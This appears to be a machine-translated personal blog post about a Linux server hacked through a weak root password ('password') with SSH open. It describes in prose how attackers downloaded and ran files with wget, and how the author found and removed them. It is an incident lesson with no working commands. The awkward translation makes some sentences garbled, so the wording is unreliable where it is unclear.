I have been engaged in the IT industry for more than 6 years, this period has tried many directions, but basically do not do development. Recently began to try to do operations. Let's talk about the first accident since the operation.
That afternoon received the development of the work order, asked to shelves 2 Linux servers, as long as the installation of CentOS6.5 operating system, and then open to 22 ports. The requirements are very simple. Soon, the root password is set to password. And then deliver research and development. After that, it was a pleasant Saturday and a depressing Sunday. Because this Sunday I was led to inform the company to check the network because the company server is inaccessible. The test came, I thought.
Rushed to the company after the first is the login firewall to determine whether the outside network is broken, is ping Baidu, found not only no problem and very process. So the rapid positioning should be the intranet problem. The test found that the server reached the firewall in the network port latency is very high. This basic can certainly be the intranet problem, but what is the matter? Why is the intranet so congested? My first thought was that there could be a Dos attack or a broadcast storm. The first way I think about it is to grab a packet on a firewall or switch or server to see it. But the network too card, can't remote, only local operation. Then came to the computer room, ready to wire the time I found that there are several switch interface lights flashing frequently, not quite normal. I looked at a few of these interfaces that I just got on the shelves. The psychology was mixed. Hi is the problem should be very coincidentally discovered. The worry is that the server may be hey. So immediately log in to the server to see, but also no experience, must only start to do soon. The first thing is to use the last to check the login history, found that there are a lot of network address login device. The second thing to do is to use the history command to view the command. Unexpectedly also found abnormal. There are several groups that use the wget command to download files from the extranet, and then give execute permissions after the command is executed in the background. By these two points, it can be concluded that the server is black is sure, after that is a lengthy troubleshooting work. Delete the file, kill the process, check whether to set up automatic download, whether to add new users and so on. It took a while to delete the files, because an attack program was deleted and then rebuilt. It was almost like I was going to install the new system. Finally, I found a file that was exactly the same as the point at which the attack was started, and found that the attack program was not started automatically when it was deleted.
After hindsight, this time the black was completely a low-level error caused, that is weak password. I used to be safe when the unanimous feel that the black will not be so simple, after this incident I found that as long as your mistake is low enough, then the black back will be unusually simple. Be sure to remember the lesson of this blood. Weak password!!!
Linux practices-Weak passwords cause the server to be hacked